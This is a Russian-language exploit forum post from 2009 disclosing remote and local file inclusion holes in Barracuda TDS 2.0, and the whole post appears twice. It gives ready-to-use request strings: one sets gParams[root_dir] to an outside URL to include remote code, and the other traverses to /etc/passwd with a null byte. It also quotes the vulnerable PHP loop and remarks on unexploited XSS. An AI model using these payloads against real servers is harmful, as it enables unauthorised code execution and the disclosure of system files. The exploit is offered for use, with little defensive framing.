BlackSun
18.03.2009, 22:42
Barracuda TDS
Версия: 2.0
Скачать: http://skripters.com/engine/download.php?id=555
Зависимость: register_globals = on
RFI \ LFI (укомплектовано раскрытием путей))
Запрос:
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=http://google.com/?
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
$g_all_objects = array();
reset($g_all_objects);
foreach($g_allowed_array['components'] as $key)
{
require_once($gParams['root_dir'].'components/'.$key.'.php');
$key = substr( $key, 0, strlen( $key )-1 );
$a = 'g'.$key;
$b = 'c'.$key;
$$a = new $b($gComponent);
$g_all_objects[] = $a;
}
Еще присутствует мешок XSS'ок, только накой они нужны, если есть RFI? :)
Версия: 2.0
Скачать: http://skripters.com/engine/download.php?id=555
Зависимость: register_globals = on
RFI \ LFI (укомплектовано раскрытием путей))
Запрос:
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=http://google.com/?
include_components.php?g_allowed_array[components][]=a&gParams[root_dir]=../../../../../../../../../../../../etc/passwd%00
Уязвимый кусок кода:
$g_all_objects = array();
reset($g_all_objects);
foreach($g_allowed_array['components'] as $key)
{
require_once($gParams['root_dir'].'components/'.$key.'.php');
$key = substr( $key, 0, strlen( $key )-1 );
$a = 'g'.$key;
$b = 'c'.$key;
$$a = new $b($gComponent);
$g_all_objects[] = $a;
}
Еще присутствует мешок XSS'ок, только накой они нужны, если есть RFI? :)